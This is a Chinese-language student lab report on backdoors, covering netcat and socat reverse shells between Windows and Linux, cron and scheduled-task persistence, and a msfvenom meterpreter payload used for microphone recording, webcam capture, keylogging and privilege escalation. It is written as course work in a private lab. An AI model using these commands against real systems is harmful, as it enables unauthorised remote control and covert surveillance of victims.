Exp2 後門原理與實踐
一、實踐目標與內容
1.學習內容
- 使用nc實現win,mac,Linux間的後門連接
- meterpreter的應用
- MSF POST 模塊的應用
2.學習目標
- 學習建立一個後門連接,並了解其中的知識點,同時熟悉後門連接的功能。通過親手實踐並了解這一事實,提高自己的安全意識 。
3.概念
- 後門就是不經過正常認證流程而訪問系統的通道。
- netcat是一個底層工具,進行基本的TCP UDP數據收發。常被與其他工具結合使用,起到後門的作用。
- socat是ncat的增強版,它使用的格式是socat [options]
- 其中兩個address是必選項,而options 是可選項。socat的基本功能就是建立兩個雙向的字節流,數據就在其間傳輸,參數address就是代表了其中的一個方向。所謂流,代表了數據的流向,而數據則可以有許多不同的類型,命令中也就相應需要許多選項對各種不同的類型數據流進行限定與說明。
二、實踐步驟:常用的後門工具的應用
2.1 Windows與linux間獲取Shell
2.1.1 Windows主機獲取 Linux Shell
Windows:
- win主機查本機IP地址:
ipconfig
由上圖可見IPv4 地址為:192.168.72.1
2.利用netcat.exe程序監聽端口:4303
kali:
3.使用nc 192.168.72.1 4303 -e /bin/sh
指令反向連接Windows主機的4303端口:
註意:192.168.72.1為win主機地址,即第一步的操作,端口號為自己學號.
4.Windows執行linux shell指令
此時可以在win_cmd.exe下運行linux 指令
2.1.2 Linux主機獲取 Windows shell
Linux :
- 查看kali主機IP地址:
ifconfig
上圖可見kali主機IP地址為192.168.72.128
2.輸入nc -l -p 4303
Windows:
3.在cmd窗口使用 ncat.exe -e cmd.exe 192.168.72.128 4303
命令去連接Linux的4305端口。
4.Linux運行Windows shell
ps:連接成功後便可以在linux主機輸入windows指令,正常情況下為亂碼.
2.2 ncat進行數據傳輸
1.Windows輸入指令ncat.exe -l 4303
監聽
2.Linux輸入指令nc 192.168.72.1 4303
連接win主機
3.雙向傳輸字符串
2.3 ncat 定時啟動
1.Windows輸入指令ncat.exe -l -p 4303
監聽
2.Linux輸入指令crontab -e
,選擇一個文本編輯器打開,在最後一行添加代碼:30 * * * * /bin/netcat Win的IP 端口 -e /bin/sh
在每小時的30分運行ncat回連win主機
3.時間一到,可以運行Linux shell指令了
註:我當時時間設置代碼的時間是20:27,所以3分後就可以看到結果。
2.4
1.找到控制面板,依次打開 控制面板->系統和安全->管理工具->任務計劃,新建一個任務
設置如上
2.新建一個觸發器
設置如上
3.新建一個操作
設置如上,其中參數為tcp-listen:4303 exec:cmd.exe,pty,stderr
,4303為端口號.
4.檢查程序是否在運行
5.Linux輸入指令 socat - tcp:192.168.72.1:4303
, windows主機IP、端口號,此時可以獲取win的shell命令
三、體驗 MSF Meterpreter 功能
3.1 利用msfvenom指令生成後門程序
1.在Linux主機輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20154303_backdoor.exe
,此條指令意為生成一個.exe程序,名稱為 20154303_backdoor,將來在windows上運行時會回連到Linux主機相應端口
2.成功之後該文件在當前目錄,找到之後拷貝到Windows主機,地址任意。
3.2 linux進入控制臺進行設置
1.Linux輸入指令msfconsole
2.在msf>下輸入命令use exploit/multi/handler
3.繼續輸入set payload windows/meterpreter/reverse_tcp
設置payload
4.輸入指令set LHOST Linux IP
5.輸入指令 set LPORT 4305
6.輸入指令show options
3.3 linux開啟監聽,windows運行後門
1.Linux輸入指令exploit
開始監聽
2.windows主機雙擊後門木馬程序執行
3.4 Linux主機操控Windows主機
3.4.1 輸入指令record_mic
錄制一段音頻
3.4.2 輸入指令webcam_snap
拍攝照片
不太好意思出鏡......
3.4.3 輸入指令keyscan_start
記錄擊鍵內容,輸入指令keyscan_dump
獲取擊鍵記錄
下圖是我在win主機上輸入的內容
3.4.4 輸入指令getuid
查看當前用戶,輸入指令getsystem
提權
四、回答問題
1.例舉你能想到的一個後門進入到你系統中的可能方式?
下載盜版的軟件。
2.例舉你知道的後門如何啟動起來(win及linux)的方式?
win中的後門伴隨軟件啟動
linux可以用corn啟動
3.Meterpreter有哪些給你映像深刻的功能?
錄音拍照截屏以及記錄鍵擊,可能泄露大量隱私。
4.如何發現自己有系統有無後門
安裝可靠的殺毒軟件
五、實驗感想
這次實驗的結果使我感到十分震撼,我才發現通過後門,我們的隱私以及個人信息會如此輕易的泄露出去,這提高了我的警覺。實驗過程並不難,我的問題是kali和本機地址開始不在同一網段上導致無法進行,後來設置虛擬器子網改變了ip地址,使實驗順利進行下去。
Exp2 後門原理與實踐